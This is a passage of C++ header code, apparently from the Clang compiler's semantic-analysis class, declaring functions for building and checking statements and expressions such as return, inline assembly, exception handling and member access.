StmtResult ActOnGotoStmt(SourceLocation GotoLoc,
SourceLocation LabelLoc,
LabelDecl *TheDecl);
StmtResult ActOnIndirectGotoStmt(SourceLocation GotoLoc,
SourceLocation StarLoc,
Expr *DestExp);
StmtResult ActOnContinueStmt(SourceLocation ContinueLoc, Scope *CurScope);
StmtResult ActOnBreakStmt(SourceLocation BreakLoc, Scope *CurScope);
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind, unsigned NumParams);
typedef std::pair<StringRef, QualType> CapturedParamNameType;
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind,
ArrayRef<CapturedParamNameType> Params,
unsigned OpenMPCaptureLevel = 0);
StmtResult ActOnCapturedRegionEnd(Stmt *S);
void ActOnCapturedRegionError();
RecordDecl *CreateCapturedStmtRecordDecl(CapturedDecl *&CD,
SourceLocation Loc,
unsigned NumParams);
enum CopyElisionSemanticsKind {
CES_Strict = 0,
CES_AllowParameters = 1,
CES_AllowDifferentTypes = 2,
CES_AllowExceptionVariables = 4,
CES_FormerDefault = (CES_AllowParameters),
CES_Default = (CES_AllowParameters | CES_AllowDifferentTypes),
CES_AsIfByStdMove = (CES_AllowParameters | CES_AllowDifferentTypes |
CES_AllowExceptionVariables),
};
VarDecl *getCopyElisionCandidate(QualType ReturnType, Expr *E,
CopyElisionSemanticsKind CESK);
bool isCopyElisionCandidate(QualType ReturnType, const VarDecl *VD,
CopyElisionSemanticsKind CESK);
StmtResult ActOnReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp,
Scope *CurScope);
StmtResult BuildReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnCapScopeReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnGCCAsmStmt(SourceLocation AsmLoc, bool IsSimple,
bool IsVolatile, unsigned NumOutputs,
unsigned NumInputs, IdentifierInfo **Names,
MultiExprArg Constraints, MultiExprArg Exprs,
Expr *AsmString, MultiExprArg Clobbers,
unsigned NumLabels,
SourceLocation RParenLoc);
void FillInlineAsmIdentifierInfo(Expr *Res,
llvm::InlineAsmIdentifierInfo &Info);
ExprResult LookupInlineAsmIdentifier(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Id,
bool IsUnevaluatedContext);
bool LookupInlineAsmField(StringRef Base, StringRef Member,
unsigned &Offset, SourceLocation AsmLoc);
ExprResult LookupInlineAsmVarDeclField(Expr *RefExpr, StringRef Member,
SourceLocation AsmLoc);
StmtResult ActOnMSAsmStmt(SourceLocation AsmLoc, SourceLocation LBraceLoc,
ArrayRef<Token> AsmToks,
StringRef AsmString,
unsigned NumOutputs, unsigned NumInputs,
ArrayRef<StringRef> Constraints,
ArrayRef<StringRef> Clobbers,
ArrayRef<Expr*> Exprs,
SourceLocation EndLoc);
LabelDecl *GetOrCreateMSAsmLabel(StringRef ExternalLabelName,
SourceLocation Location,
bool AlwaysCreate);
VarDecl *BuildObjCExceptionDecl(TypeSourceInfo *TInfo, QualType ExceptionType,
SourceLocation StartLoc,
SourceLocation IdLoc, IdentifierInfo *Id,
bool Invalid = false);
Decl *ActOnObjCExceptionDecl(Scope *S, Declarator &D);
StmtResult ActOnObjCAtCatchStmt(SourceLocation AtLoc, SourceLocation RParen,
Decl *Parm, Stmt *Body);
StmtResult ActOnObjCAtFinallyStmt(SourceLocation AtLoc, Stmt *Body);
StmtResult ActOnObjCAtTryStmt(SourceLocation AtLoc, Stmt *Try,
MultiStmtArg Catch, Stmt *Finally);
StmtResult BuildObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw);
StmtResult ActOnObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw,
Scope *CurScope);
ExprResult ActOnObjCAtSynchronizedOperand(SourceLocation atLoc,
Expr *operand);
StmtResult ActOnObjCAtSynchronizedStmt(SourceLocation AtLoc,
Expr *SynchExpr,
Stmt *SynchBody);
StmtResult ActOnObjCAutoreleasePoolStmt(SourceLocation AtLoc, Stmt *Body);
VarDecl *BuildExceptionDeclaration(Scope *S, TypeSourceInfo *TInfo,
SourceLocation StartLoc,
SourceLocation IdLoc,
IdentifierInfo *Id);
Decl *ActOnExceptionDeclarator(Scope *S, Declarator &D);
StmtResult ActOnCXXCatchBlock(SourceLocation CatchLoc,
Decl *ExDecl, Stmt *HandlerBlock);
StmtResult ActOnCXXTryBlock(SourceLocation TryLoc, Stmt *TryBlock,
ArrayRef<Stmt *> Handlers);
StmtResult ActOnSEHTryBlock(bool IsCXXTry, // try (true) or __try (false) ?
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
StmtResult ActOnSEHExceptBlock(SourceLocation Loc,
Expr *FilterExpr,
Stmt *Block);
void ActOnStartSEHFinallyBlock();
void ActOnAbortSEHFinallyBlock();
StmtResult ActOnFinishSEHFinallyBlock(SourceLocation Loc, Stmt *Block);
StmtResult ActOnSEHLeaveStmt(SourceLocation Loc, Scope *CurScope);
void DiagnoseReturnInConstructorExceptionHandler(CXXTryStmt *TryBlock);
bool ShouldWarnIfUnusedFileScopedDecl(const DeclaratorDecl *D) const;
/// If it's a file scoped decl that must warn if not used, keep track
/// of it.
void MarkUnusedFileScopedDecl(const DeclaratorDecl *D);
/// DiagnoseUnusedExprResult - If the statement passed in is an expression
/// whose result is unused, warn.
void DiagnoseUnusedExprResult(const Stmt *S);
void DiagnoseUnusedNestedTypedefs(const RecordDecl *D);
void DiagnoseUnusedDecl(const NamedDecl *ND);
/// Emit \p DiagID if statement located on \p StmtLoc has a suspicious null
/// statement as a \p Body, and it is located on the same line.
///
/// This helps prevent bugs due to typos, such as:
/// if (condition);
/// do_stuff();
void DiagnoseEmptyStmtBody(SourceLocation StmtLoc,
const Stmt *Body,
unsigned DiagID);
/// Warn if a for/while loop statement \p S, which is followed by
/// \p PossibleBody, has a suspicious null statement as a body.
void DiagnoseEmptyLoopBody(const Stmt *S,
const Stmt *PossibleBody);
/// Warn if a value is moved to itself.
void DiagnoseSelfMove(const Expr *LHSExpr, const Expr *RHSExpr,
SourceLocation OpLoc);
/// Warn if we're implicitly casting from a _Nullable pointer type to a
/// _Nonnull one.
void diagnoseNullableToNonnullConversion(QualType DstType, QualType SrcType,
SourceLocation Loc);
/// Warn when implicitly casting 0 to nullptr.
void diagnoseZeroToNullptrConversion(CastKind Kind, const Expr *E);
ParsingDeclState PushParsingDeclaration(sema::DelayedDiagnosticPool &pool) {
return DelayedDiagnostics.push(pool);
}
void PopParsingDeclaration(ParsingDeclState state, Decl *decl);
typedef ProcessingContextState ParsingClassState;
ParsingClassState PushParsingClass() {
ParsingClassDepth++;
return DelayedDiagnostics.pushUndelayed();
}
void PopParsingClass(ParsingClassState state) {
ParsingClassDepth--;
DelayedDiagnostics.popUndelayed(state);
}
void redelayDiagnostics(sema::DelayedDiagnosticPool &pool);
void DiagnoseAvailabilityOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass,
bool ObjCPropertyAccess,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
bool makeUnavailableInSystemHeader(SourceLocation loc,
UnavailableAttr::ImplicitReason reason);
/// Issue any -Wunguarded-availability warnings in \c FD
void DiagnoseUnguardedAvailabilityViolations(Decl *FD);
void handleDelayedAvailabilityCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
//===--------------------------------------------------------------------===//
// Expression Parsing Callbacks: SemaExpr.cpp.
bool CanUseDecl(NamedDecl *D, bool TreatUnavailableAsInvalid);
bool DiagnoseUseOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass = nullptr,
bool ObjCPropertyAccess = false,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReciever = nullptr);
void NoteDeletedFunction(FunctionDecl *FD);
void NoteDeletedInheritingConstructor(CXXConstructorDecl *CD);
bool DiagnosePropertyAccessorMismatch(ObjCPropertyDecl *PD,
ObjCMethodDecl *Getter,
SourceLocation Loc);
void DiagnoseSentinelCalls(NamedDecl *D, SourceLocation Loc,
ArrayRef<Expr *> Args);
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, Decl *LambdaContextDecl = nullptr,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
enum ReuseLambdaContextDecl_t { ReuseLambdaContextDecl };
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, ReuseLambdaContextDecl_t,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
void PopExpressionEvaluationContext();
void DiscardCleanupsInEvaluationContext();
ExprResult TransformToPotentiallyEvaluated(Expr *E);
ExprResult HandleExprEvaluationContextForTypeof(Expr *E);
ExprResult CheckUnevaluatedOperand(Expr *E);
void CheckUnusedVolatileAssignment(Expr *E);
ExprResult ActOnConstantExpression(ExprResult Res);
// Functions for marking a declaration referenced. These functions also
// contain the relevant logic for marking if a reference to a function or
// variable is an odr-use (in the C++11 sense). There are separate variants
// for expressions referring to a decl; these exist because odr-use marking
// needs to be delayed for some constant variables when we build one of the
// named expressions.
//
// MightBeOdrUse indicates whether the use could possibly be an odr-use, and
// should usually be true. This only needs to be set to false if the lack of
// odr-use cannot be determined from the current context (for instance,
// because the name denotes a virtual function and was written without an
// explicit nested-name-specifier).
void MarkAnyDeclReferenced(SourceLocation Loc, Decl *D, bool MightBeOdrUse);
void MarkFunctionReferenced(SourceLocation Loc, FunctionDecl *Func,
bool MightBeOdrUse = true);
void MarkVariableReferenced(SourceLocation Loc, VarDecl *Var);
void MarkDeclRefReferenced(DeclRefExpr *E, const Expr *Base = nullptr);
void MarkMemberReferenced(MemberExpr *E);
void MarkFunctionParmPackReferenced(FunctionParmPackExpr *E);
void MarkCaptureUsedInEnclosingContext(VarDecl *Capture, SourceLocation Loc,
unsigned CapturingScopeIndex);
ExprResult CheckLValueToRValueConversionOperand(Expr *E);
void CleanupVarDeclMarking();
enum TryCaptureKind {
TryCapture_Implicit, TryCapture_ExplicitByVal, TryCapture_ExplicitByRef
};
/// Try to capture the given variable.
///
/// \param Var The variable to capture.
///
/// \param Loc The location at which the capture occurs.
///
/// \param Kind The kind of capture, which may be implicit (for either a
/// block or a lambda), or explicit by-value or by-reference (for a lambda).
///
/// \param EllipsisLoc The location of the ellipsis, if one is provided in
/// an explicit lambda capture.
///
/// \param BuildAndDiagnose Whether we are actually supposed to add the
/// captures or diagnose errors. If false, this routine merely check whether
/// the capture can occur without performing the capture itself or complaining
/// if the variable cannot be captured.
///
/// \param CaptureType Will be set to the type of the field used to capture
/// this variable in the innermost block or lambda. Only valid when the
/// variable can be captured.
///
/// \param DeclRefType Will be set to the type of a reference to the capture
/// from within the current scope. Only valid when the variable can be
/// captured.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// variables that may or may not be used in certain specializations of
/// a nested generic lambda.
///
/// \returns true if an error occurred (i.e., the variable cannot be
/// captured) and false if the capture succeeded.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc, TryCaptureKind Kind,
SourceLocation EllipsisLoc, bool BuildAndDiagnose,
QualType &CaptureType,
QualType &DeclRefType,
const unsigned *const FunctionScopeIndexToStopAt);
/// Try to capture the given variable.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc,
TryCaptureKind Kind = TryCapture_Implicit,
SourceLocation EllipsisLoc = SourceLocation());
/// Checks if the variable must be captured.
bool NeedToCaptureVariable(VarDecl *Var, SourceLocation Loc);
/// Given a variable, determine the type that a reference to that
/// variable will have in the given scope.
QualType getCapturedDeclRefType(VarDecl *Var, SourceLocation Loc);
/// Mark all of the declarations referenced within a particular AST node as
/// referenced. Used when template instantiation instantiates a non-dependent
/// type -- entities referenced by the type are now referenced.
void MarkDeclarationsReferencedInType(SourceLocation Loc, QualType T);
void MarkDeclarationsReferencedInExpr(Expr *E,
bool SkipLocalVariables = false);
/// Try to recover by turning the given expression into a
/// call. Returns true if recovery was attempted or an error was
/// emitted; this may also leave the ExprResult invalid.
bool tryToRecoverWithCall(ExprResult &E, const PartialDiagnostic &PD,
bool ForceComplain = false,
bool (*IsPlausibleResult)(QualType) = nullptr);
/// Figure out if an expression could be turned into a call.
bool tryExprAsCall(Expr &E, QualType &ZeroArgCallReturnTy,
UnresolvedSetImpl &NonTemplateOverloads);
/// Conditionally issue a diagnostic based on the current
/// evaluation context.
///
/// \param Statement If Statement is non-null, delay reporting the
/// diagnostic until the function body is parsed, and then do a basic
/// reachability analysis to determine if the statement is reachable.
/// If it is unreachable, the diagnostic will not be emitted.
bool DiagRuntimeBehavior(SourceLocation Loc, const Stmt *Statement,
const PartialDiagnostic &PD);
/// Similar, but diagnostic is only produced if all the specified statements
/// are reachable.
bool DiagRuntimeBehavior(SourceLocation Loc, ArrayRef<const Stmt*> Stmts,
const PartialDiagnostic &PD);
// Primary Expressions.
SourceRange getExprRange(Expr *E) const;
ExprResult ActOnIdExpression(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
UnqualifiedId &Id, bool HasTrailingLParen, bool IsAddressOfOperand,
CorrectionCandidateCallback *CCC = nullptr,
bool IsInlineAsmIdentifier = false, Token *KeywordReplacement = nullptr);
void DecomposeUnqualifiedId(const UnqualifiedId &Id,
TemplateArgumentListInfo &Buffer,
DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *&TemplateArgs);
bool
DiagnoseEmptyLookup(Scope *S, CXXScopeSpec &SS, LookupResult &R,
CorrectionCandidateCallback &CCC,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
ArrayRef<Expr *> Args = None, TypoExpr **Out = nullptr);
DeclResult LookupIvarInObjCMethod(LookupResult &Lookup, Scope *S,
IdentifierInfo *II);
ExprResult BuildIvarRefExpr(Scope *S, SourceLocation Loc, ObjCIvarDecl *IV);
ExprResult LookupInObjCMethod(LookupResult &LookUp, Scope *S,
IdentifierInfo *II,
bool AllowBuiltinCreation=false);
ExprResult ActOnDependentIdExpression(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
bool isAddressOfOperand,
const TemplateArgumentListInfo *TemplateArgs);
/// If \p D cannot be odr-used in the current expression evaluation context,
/// return a reason explaining why. Otherwise, return NOUR_None.
NonOdrUseReason getNonOdrUseReasonInCurrentContext(ValueDecl *D);
DeclRefExpr *BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
SourceLocation Loc,
const CXXScopeSpec *SS = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
const CXXScopeSpec *SS = nullptr,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
NestedNameSpecifierLoc NNS,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
ExprResult
BuildAnonymousStructUnionMemberReference(
const CXXScopeSpec &SS,
SourceLocation nameLoc,
IndirectFieldDecl *indirectField,
DeclAccessPair FoundDecl = DeclAccessPair::make(nullptr, AS_none),
Expr *baseObjectExpr = nullptr,
SourceLocation opLoc = SourceLocation());
ExprResult BuildPossibleImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S);
ExprResult BuildImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
bool IsDefiniteInstance,
const Scope *S);
bool UseArgumentDependentLookup(const CXXScopeSpec &SS,
const LookupResult &R,
bool HasTrailingLParen);
ExprResult
BuildQualifiedDeclarationNameExpr(CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
bool IsAddressOfOperand, const Scope *S,
TypeSourceInfo **RecoveryTSI = nullptr);
ExprResult BuildDependentDeclRefExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildDeclarationNameExpr(const CXXScopeSpec &SS,
LookupResult &R,
bool NeedsADL,
bool AcceptInvalidDecl = false);
ExprResult BuildDeclarationNameExpr(
const CXXScopeSpec &SS, const DeclarationNameInfo &NameInfo, NamedDecl *D,
NamedDecl *FoundD = nullptr,
const TemplateArgumentListInfo *TemplateArgs = nullptr,
bool AcceptInvalidDecl = false);
ExprResult BuildLiteralOperatorCall(LookupResult &R,
DeclarationNameInfo &SuffixInfo,
ArrayRef<Expr *> Args,
SourceLocation LitEndLoc,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
ExprResult BuildPredefinedExpr(SourceLocation Loc,
PredefinedExpr::IdentKind IK);
ExprResult ActOnPredefinedExpr(SourceLocation Loc, tok::TokenKind Kind);
ExprResult ActOnIntegerConstant(SourceLocation Loc, uint64_t Val);
ExprResult BuildUniqueStableName(SourceLocation Loc, TypeSourceInfo *Operand);
ExprResult BuildUniqueStableName(SourceLocation Loc, Expr *E);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, ParsedType Ty);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, Expr *E);
bool CheckLoopHintExpr(Expr *E, SourceLocation Loc);
ExprResult ActOnNumericConstant(const Token &Tok, Scope *UDLScope = nullptr);
ExprResult ActOnCharacterConstant(const Token &Tok,
Scope *UDLScope = nullptr);
ExprResult ActOnParenExpr(SourceLocation L, SourceLocation R, Expr *E);
ExprResult ActOnParenListExpr(SourceLocation L,
SourceLocation R,
MultiExprArg Val);
/// ActOnStringLiteral - The specified tokens were lexed as pasted string
/// fragments (e.g. "foo" "bar" L"baz").
ExprResult ActOnStringLiteral(ArrayRef<Token> StringToks,
Scope *UDLScope = nullptr);
ExprResult ActOnGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<ParsedType> ArgTypes,
ArrayRef<Expr *> ArgExprs);
ExprResult CreateGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<TypeSourceInfo *> Types,
ArrayRef<Expr *> Exprs);
// Binary/Unary Operators. 'Tok' is the token for the operator.
ExprResult CreateBuiltinUnaryOp(SourceLocation OpLoc, UnaryOperatorKind Opc,
Expr *InputExpr);
ExprResult BuildUnaryOp(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opc, Expr *Input);
ExprResult ActOnUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Op, Expr *Input);
bool isQualifiedMemberAccess(Expr *E);
QualType CheckAddressOfOperand(ExprResult &Operand, SourceLocation OpLoc);
ExprResult CreateUnaryExprOrTypeTraitExpr(TypeSourceInfo *TInfo,
SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
SourceRange R);
ExprResult CreateUnaryExprOrTypeTraitExpr(Expr *E, SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind);
ExprResult
ActOnUnaryExprOrTypeTraitExpr(SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
bool IsType, void *TyOrEx,
SourceRange ArgRange);
ExprResult CheckPlaceholderExpr(Expr *E);
bool CheckVecStepExpr(Expr *E);
bool CheckUnaryExprOrTypeTraitOperand(Expr *E, UnaryExprOrTypeTrait ExprKind);
bool CheckUnaryExprOrTypeTraitOperand(QualType ExprType, SourceLocation OpLoc,
SourceRange ExprRange,
UnaryExprOrTypeTrait ExprKind);
ExprResult ActOnSizeofParameterPackExpr(Scope *S,
SourceLocation OpLoc,
IdentifierInfo &Name,
SourceLocation NameLoc,
SourceLocation RParenLoc);
ExprResult ActOnPostfixUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Kind, Expr *Input);
ExprResult ActOnArraySubscriptExpr(Scope *S, Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult CreateBuiltinArraySubscriptExpr(Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult ActOnOMPArraySectionExpr(Expr *Base, SourceLocation LBLoc,
Expr *LowerBound, SourceLocation ColonLoc,
Expr *Length, SourceLocation RBLoc);
ExprResult ActOnOMPArrayShapingExpr(Expr *Base, SourceLocation LParenLoc,
SourceLocation RParenLoc,
ArrayRef<Expr *> Dims,
ArrayRef<SourceRange> Brackets);
/// Data structure for iterator expression.
struct OMPIteratorData {
IdentifierInfo *DeclIdent = nullptr;
SourceLocation DeclIdentLoc;
ParsedType Type;
OMPIteratorExpr::IteratorRange Range;
SourceLocation AssignLoc;
SourceLocation ColonLoc;
SourceLocation SecColonLoc;
};
ExprResult ActOnOMPIteratorExpr(Scope *S, SourceLocation IteratorKwLoc,
SourceLocation LLoc, SourceLocation RLoc,
ArrayRef<OMPIteratorData> Data);
// This struct is for use by ActOnMemberAccess to allow
// BuildMemberReferenceExpr to be able to reinvoke ActOnMemberAccess after
// changing the access operator from a '.' to a '->' (to see if that is the
// change needed to fix an error about an unknown member, e.g. when the class
// defines a custom operator->).
struct ActOnMemberAccessExtraArgs {
Scope *S;
UnqualifiedId &Id;
Decl *ObjCImpDecl;
};
ExprResult BuildMemberReferenceExpr(
Expr *Base, QualType BaseType, SourceLocation OpLoc, bool IsArrow,
CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult
BuildMemberReferenceExpr(Expr *Base, QualType BaseType, SourceLocation OpLoc,
bool IsArrow, const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
bool SuppressQualifierCheck = false,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult BuildFieldReferenceExpr(Expr *BaseExpr, bool IsArrow,
SourceLocation OpLoc,
const CXXScopeSpec &SS, FieldDecl *Field,
DeclAccessPair FoundDecl,
const DeclarationNameInfo &MemberNameInfo);
ExprResult PerformMemberExprBaseConversion(Expr *Base, bool IsArrow);
bool CheckQualifiedMemberReference(Expr *BaseExpr, QualType BaseType,
const CXXScopeSpec &SS,
const LookupResult &R);
ExprResult ActOnDependentMemberExpr(Expr *Base, QualType BaseType,
bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult ActOnMemberAccessExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Member,
Decl *ObjCImpDecl);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec *SS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
NestedNameSpecifierLoc NNS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
void ActOnDefaultCtorInitializers(Decl *CDtorDecl);
bool ConvertArgumentsForCall(CallExpr *Call, Expr *Fn,
FunctionDecl *FDecl,
const FunctionProtoType *Proto,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
bool ExecConfig = false);
void CheckStaticArrayArgument(SourceLocation CallLoc,
ParmVarDecl *Param,
const Expr *ArgExpr);
/// ActOnCallExpr - Handle a call to Fn with the specified array of arguments.
/// This provides the location of the left/right parens and a list of comma
/// locations.
ExprResult ActOnCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr);
ExprResult BuildCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr,
bool IsExecConfig = false);
enum class AtomicArgumentOrder { API, AST };
ExprResult
BuildAtomicExpr(SourceRange CallRange, SourceRange ExprRange,
SourceLocation RParenLoc, MultiExprArg Args,
AtomicExpr::AtomicOp Op,
AtomicArgumentOrder ArgOrder = AtomicArgumentOrder::API);
ExprResult
BuildResolvedCallExpr(Expr *Fn, NamedDecl *NDecl, SourceLocation LParenLoc,
ArrayRef<Expr *> Arg, SourceLocation RParenLoc,
Expr *Config = nullptr, bool IsExecConfig = false,
ADLCallKind UsesADL = ADLCallKind::NotADL);
ExprResult ActOnCUDAExecConfigExpr(Scope *S, SourceLocation LLLLoc,
MultiExprArg ExecConfig,
SourceLocation GGGLoc);
ExprResult ActOnCastExpr(Scope *S, SourceLocation LParenLoc,
Declarator &D, ParsedType &Ty,
SourceLocation RParenLoc, Expr *CastExpr);
ExprResult BuildCStyleCastExpr(SourceLocation LParenLoc,
TypeSourceInfo *Ty,
SourceLocation RParenLoc,
Expr *Op);
CastKind PrepareScalarCast(ExprResult &src, QualType destType);
/// Build an altivec or OpenCL literal.
ExprResult BuildVectorLiteral(SourceLocation LParenLoc,
SourceLocation RParenLoc, Expr *E,
TypeSourceInfo *TInfo);
ExprResult MaybeConvertParenListExprToParenExpr(Scope *S, Expr *ME);
ExprResult ActOnCompoundLiteral(SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc,
Expr *InitExpr);
ExprResult BuildCompoundLiteralExpr(SourceLocation LParenLoc,
TypeSourceInfo *TInfo,
SourceLocation RParenLoc,
Expr *LiteralExpr);
ExprResult ActOnInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult BuildInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult ActOnDesignatedInitializer(Designation &Desig,
SourceLocation EqualOrColonLoc,
bool GNUSyntax,
ExprResult Init);
private:
static BinaryOperatorKind ConvertTokenKindToBinaryOpcode(tok::TokenKind Kind);
public:
ExprResult ActOnBinOp(Scope *S, SourceLocation TokLoc,
tok::TokenKind Kind, Expr *LHSExpr, Expr *RHSExpr);
ExprResult BuildBinOp(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opc, Expr *LHSExpr, Expr *RHSExpr);
ExprResult CreateBuiltinBinOp(SourceLocation OpLoc, BinaryOperatorKind Opc,
Expr *LHSExpr, Expr *RHSExpr);
void DiagnoseCommaOperator(const Expr *LHS, SourceLocation Loc);
/// ActOnConditionalOp - Parse a ?: operation. Note that 'LHS' may be null
/// in the case of a the GNU conditional expr extension.
ExprResult ActOnConditionalOp(SourceLocation QuestionLoc,
SourceLocation ColonLoc,
Expr *CondExpr, Expr *LHSExpr, Expr *RHSExpr);
/// ActOnAddrLabel - Parse the GNU address of label extension: "&&foo".
ExprResult ActOnAddrLabel(SourceLocation OpLoc, SourceLocation LabLoc,
LabelDecl *TheDecl);
void ActOnStartStmtExpr();
ExprResult ActOnStmtExpr(Scope *S, SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc);
ExprResult BuildStmtExpr(SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc, unsigned TemplateDepth);
// Handle the final expression in a statement expression.
ExprResult ActOnStmtExprResult(ExprResult E);
void ActOnStmtExprError();
// __builtin_offsetof(type, identifier(.identifier|[expr])*)
struct OffsetOfComponent {
SourceLocation LocStart, LocEnd;
bool isBrackets; // true if [expr], false if .ident
union {
IdentifierInfo *IdentInfo;
Expr *E;
} U;
};
/// __builtin_offsetof(type, a.b[123][456].c)
ExprResult BuildBuiltinOffsetOf(SourceLocation BuiltinLoc,
TypeSourceInfo *TInfo,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
ExprResult ActOnBuiltinOffsetOf(Scope *S,
SourceLocation BuiltinLoc,
SourceLocation TypeLoc,
ParsedType ParsedArgTy,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
// __builtin_choose_expr(constExpr, expr1, expr2)
ExprResult ActOnChooseExpr(SourceLocation BuiltinLoc,
Expr *CondExpr, Expr *LHSExpr,
Expr *RHSExpr, SourceLocation RPLoc);
// __builtin_va_arg(expr, type)
ExprResult ActOnVAArg(SourceLocation BuiltinLoc, Expr *E, ParsedType Ty,
SourceLocation RPLoc);
ExprResult BuildVAArgExpr(SourceLocation BuiltinLoc, Expr *E,
TypeSourceInfo *TInfo, SourceLocation RPLoc);
